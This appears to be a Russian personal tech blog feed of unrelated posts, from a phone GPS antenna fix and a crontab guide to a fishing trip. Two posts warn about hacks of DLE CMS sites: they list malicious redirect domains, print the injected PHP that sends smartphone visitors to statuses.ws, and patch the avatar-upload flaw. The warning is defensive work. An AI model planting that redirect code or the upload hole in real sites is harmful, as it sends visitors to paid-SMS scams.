Решение проблемы с GPS на смартфоне JIAYU G3

 

После долгих песен с бубном(удаление файлов, многочисленные перезагрузки, скачивание данных EPO и прочего…. )
было решено поступить кардинально.

В моем случае после обновления данных EPO спутники выстраивались в ряд штук 12-14, но уровень от этих спутников был почти всегда 0. Один единственный раз, когда оставил телефон в машине на некоторое время он нашел и установил соединение с несколькими спутниками. Больше мне добиться подобного не удавалось.

Решил я проверить свою GPS антенну. Как не проверял контакта с общим проводом не было. Было решено заменить штатную антенну. Для этого необходимо снять заднюю внутреннюю крышку телефона.

на задней крышке есть контакт для GPS антенны

 

Я взял фольгу от недоеденного деда мороза
Вырезал в виде буквы Г, кончик должен быть тоньше, чем основание.
Кончик фольги вставляем в прорезь и загибаем поверх старого контакта.

 

 Вот здесь видно как вставлена новая «антенна»

Вид сбоку

 

 

Здесь оставшийся кончик сложен под 90 градусов и приклеен скотчем.

Ну а это результат.

Вообщем проблема в плохом качестве штатной GPS антенны.
Она может периодически не контачить или вообще не иметь контакта.
Видимо дело в плохом напылении токопроводящего слоя.

И еще:

Скрин с YGPS, уровень сигнала зависит от многих факторов. Эти скрины в пасмурную погоду, солнца нет.
У меня с родной антенной уровень сигнала по всем спутникам был 0
Антенна обязательно должна иметь контакт с платой! Фольга загибается и ложится поверх контактной площадки штатной антенны.

 

Размеры антенны: длина 21 мм и ширина 6 мм вырезал на «глаз», так как сразу заработало, то не стал ничего менять.

 

Вот тесты в машине и на открытой местности(было пасмурно) думаю, что точности достаточно вам же не ракеты запускать по цели.

 

 

 

Очередной взлом сайтов на DLE

Ну вот не прошло и нескольких дней как хакер(предположительно с Украины) продолжил свою деятельность по взому сайтов на DLE.

В этот раз встраиваемый код стал немного другим.
Перенаправление происходит на несколько сайтов:

statuses.ws
live-internet.ws
googlecount.ws
livecountall.ws
googleinternet.ws
yacounter.ws
getinternet.ws
yandex-google.ws
ya-googl.ws
ya-analytics.ws
yadirect.ws

На этих сайтах происходит перенаправление пользователей зашедших с некоторых мобильных устройств, не со всех.

Перенаправление происходит на СМС агрегатора, который внедряет в ваш телефон приложение или вынуждает отправить платное СМС.

 

На этот раз инфицируются следующие файлы:

/index.php
/engine/data/dbconfig.php
/engine/data/config.php
/engine/init.php
/engine/engine.php
/language/Russian/website.lng

При этом взломщик предусмотрел возможность апгрейта своего скрипта встраиванием шелл кода в файлы.

Будьте внимательны!

 

 

 

 

 

Взлом DLE загрузкой аватара с вредоносным кодом

Этот новый год начался забавно.
Много лет в известном всем движке CMS DLE существовала уязвимость и никто на нее не обращал внимание. Но вот в начале этого года примерно с 6 января, видимо устав от празднования Нового года, хакер под псевдонимом tehApocalypse взломал несколько десятков тысяч сайтов на CMS DLE.

Взлом заключался во внедрении кода в несколько файлов DLE для перенаправления посетителей зараженных сайтов на сайт злоумышленника.

index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Перенаправление происходило только для пользователей сматфонов и прочих продвинутых телефонов.

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

Итак как же исправить эту уязвимость в DLE?

В нескольких файлах, в которых мы можем редактировать профиль пользователя и загружать аватар для этого пользователя есть такой код:

 

if( $thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] ) ) {
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
} else {
@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
}

Так вот все дело в этой строчке

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

Т.е. если аватар не надо изменять по размеру то исходный инжектированный файл копируется в первоначальном виде для дальнейшего использования.

Необходимо преобразовать этот блок кода в новый:

$thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] );
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

После этого загрузить аватар с вредоносным кодом будет невозможно.
Файлы для редактирования:

engine/inc/editusers.php
engine/modules/register.php
engine/modules/profile.php

Удачи!

Crontab синтаксис

Доступ в каталог /var/spool/cron непривилегированому пользователю закрыт, что бы посмотреть юзером «user» есть ли у него файл crontab, достаточно набрать команду crontab -l , если файл существует-будет показано его содержимое.

Для удаления файла используется команда crontab -r

Для редактирования crontab -e

Для управления файлами crontab пользователем «root» используется синтаксис:

crontab -u user_name file — создание файла crontab из файла «file» для  юзера «user_name»

-u означает чей crontab будет обработан, если опция не задана, то будет обработан crontab того пользователя,  который запустил команду crontab.

crontab -u user_name -l — просмотр файла crontab юзера «user_name»
crontab -u user_name -r — удаление файла crontab юзера «user_name»
crontab -u user_name -e — редактирование файла crontab  юзера «user_name» используя редактор, заданный переменной окружения VISUAL или EDITOR

Формат и значения полей

Каждая команда в пользовательском файле crontab занимает одну строку и состоит из шести полей. Пользовательские файлы crontab находятся в каталоге /var/spool/cron

Общий формат команды:

минута час день_месяца месяц день_недели команда

Допустимые значения:
минута от 0 до 59
час от 0 до 23
день_месяца от 1 до 31
месяц от 1 до 12 (можно три буквы из названия месяца,  регистр не имеет значения от jan до dec)
день_недели от 0 до 6  (0 это воскресенье,  можно писать от sun до sat)

Каждое из полей даты и времени может быть обозначено символом * , будет соответствовать любому возможному значению. Для этих полей можно указывать диапазоны значений, разделенных дефисом, например:
* 5 4-10 0-3 * echo «HELLO» — печать HELLO в 5:00 на 4,5,6,7,8,9,10 дни января, февраля, марта и апреля

пошаговая запись
* */2 * * sat echo «HELLO» — печать HELLO каждый четный час,   каждую субботу

равнозначная предыдущему примеру запись (списком)
* 0,2,4,6,8,10,12,14,16,18,20,22 * * sat echo «HELLO» — печать HELLO каждый четный час, каждую субботу

то же самое с указанием диапазона
* 0-23/2 * * sat echo «HELLO» -печать HELLO каждый четный  час, каждую субботу

59 23 31 dec * echo «Happy new year» —  поздравит с новым годом

Для отладки задания cron, можно перенаправить результат в файл

Пример:
0-59 * * * * /home/user/mail 2>/tmp/tmp.cron

Если при запуске команды /home/user/mail возникнут ошибки, то они будут записаны в файл /tmp/tmp.cron и вы всегда сможете узнать причину. В случае перенаправления вывода в файл, письмо, юзеру указаному в переменной MAILTO отправлено не будет.

Посмотреть информацию о всех командах запускаемых демоном cron можно в каталоге /var/log называются cron, cron1 и т.д.

В файле /var/log/cron записано время запуска всех заданий cron за предыдущий день
Mar 29 04:03:00 rst CROND[4434]: (user) CMD (/home/user/mail)
Mar 29 04:03:59 rst CROND[4493]: (user) CMD (/home/user/mail)
Mar 29 04:05:00 rst CROND[4507]: (user) CMD (/home/user/mail)
Mar 29 04:06:00 rst CROND[4549]: (user) CMD (/home/user/mail)

В остальных файлах cron1,cron2 находится подобная информация, но более старая чем в cron

Вот практически и все, что требуется знать для использования cron и crontab.

Диски и резина из Японии

Заказал я себе резину с дисками, оригинал для Mazda Tribute из Японии.

И решил найти продавца, чтоб удостовериться в «чистоте» товара.

Посмотрел фото магазина

и нашел этот магазин в гуглемэпс

Будем ждать посылочку…

У вас тормозит Opera? «Тогда мы идем к вам!»

Только для Windows XP!

Вы долго работали в браузере Opera, вы делали несколько апгрейтов вашей Oper’ы, у вас тормозит ваша Opera?

Есть решение, которое ускорит ваш браузер Opera.

После длительной работы в браузере Опера накапливается большое количество иконок от различных сайтов.

Вы посетили сайт — Опера сохранила иконку этого сайта. И так происходит с каждым сайтом.

Все сохраненные иконки Опера складывает вот сюда:

C:\Documents and Settings\[Имя Вашего Профиля]\Local Settings\Application Data\Opera\Opera\icons

Поэтому заходим и удаляем все иконки расположенные по  этому пути.

У меня их было 16,5 тысяч 🙂

После удаления иконок перезапустите Оперу.

Естественно у вас пропадут иконки сайтов в избранном и на панели ссылок, но после посещения этих сайтов иконки обновятся и все будет по прежнему.

Удачной работы и серфинга!

Как я провел конец света

Решили мы с пользой для души и дела тела провести эти выходные, на которые по чистой случайности выпало 21 декабря 2012 года. Это совпадение считать чисто случайным.

Было решено поехать на рыбалку на таежное озеро Светлое.
Подьем в 4.45 утра, быстрый сбор и в путь.

Фотал на джигурду(JIAYU G3)

 В дорогу!

Поменяли транспорт, уже светает.

 

Заправка до полного бака не помешает никогда.

 

 Подъезжаем к ледовой переправе через р. Обь, ограничение по весу 10 тонн.

Едем себе так по деревне и тут вдалеке появляется…

 

 То-ли кремль, то-ли крепость…

 Не прошло и часа по зимней дороге, как мы на месте. Из машины вышли на всякий случай — какой лед толщины еще не знаем 🙂

Три дороги: налево, направо и прямо — куда не пойдешь везде рыба 🙂

 

Мороз крепчал с каждым часом. По общим ощущениям было ниже -35°С. Как потом и подтвердилось по приезду в город.

Пикуль на мотыльнице.

Ловили традиционно на мотыля, ну и на местного аборигена — пикуля. Пикуль это личинка стрекозы. Пикуля ловили на мертвую рыбу — вот такой круговорот в природе. Рыбу ловим на пикуля, а пикуля ловим на рыбу. Пикуль довольно прожорливый тип, при отсутствии еды он жрет своих сородичей, что помельче и послабее.

 День короткий, солнце показалось и почти сразу прячется.

Скай-ду еще на ходу 🙂

 

Наш транспорт для передвижения по озеру снегоход Ski-Doo Tundra LT 600 4-TEC на вторые сутки не завелся — не выдержал сибирских морозов. Последующие двое суток простоял на снегу.

Красотища!!!

В результате было поймано немного окуней и одна щука на жерлицу.

По дороге обратно сфотали строящийся монастырь, наверно по бюджету он превосходит бюджет всей деревни. Стены 4-5 метров, чтоб демоны не напали 🙂

А вот и дорога назад, домой…

 

Конец света прошел не зря!

Русификация панели Kloxo

 

Есть такая панель управления хостингом как Kloxo.

Эта русификация позволяет выбрать русский язык в панели управления для отображения почти всех надписей на русском языке.
Локализация выполнена не на 100% есть не переведенные места.

Для установки русской локализации необходимо скачать этот архив и разместить папку ru в папке lang:

/usr/local/lxlabs/kloxo/httpdocs/lang/

Проверка производилась на пвнели Kloxo версии 6.1.12

Кодировка руссификации UTF8

Просматриваем дамп windows(.dmp)

Чем просмотреть дамп памяти windows с расширением .dmp например такой Mini031010-01.dmp

Для просмотра и необходимого нам анализа дампов памяти при синем экране смерти в ОС windows можно использовать программу  BlueScreenView в нашем случае версия 1.45

Вот так выглядит окно программы.

Программа при запуске сама находит сохраненные дампы и показывает их список в верхнем окне.

Для просмотра подробностей кликаем на нужном нам дампе в верхнем окне и видим подробности в нижнем окне.

Красным цветом выделены именно те драйвера или динамические библиотеки, которые послужили причиной синего экрана.

Если ваш синий экран появляется всегда по причине одних и тех же драйверов, то обновите эти драйвера или удалите совсем.

Удачи вам в борьве с синей смертью!

Скачать http://depositfiles.com/files/yf10otmiy

Очки дополнительной реальности от Google

Google аннонсировала тест очков дополнительной реальности.

Эти очки позволяют дополнить нашу повседневную жизнь новыми информационными гаджетами. Часть из них основывается на уже существующих сервисах от Google, например таких как Google карты.
Будет использоваться геоориентированный планировщик задач для записи намеченных встреч или свиданий.
Будет возможно использовать подсказки при передвижении как у навигационных систем.

Компания Google предлагает поучаствовать всем желающим в разработке нового гаджета и предложить все возможные  опции для очков дополнительной реальности.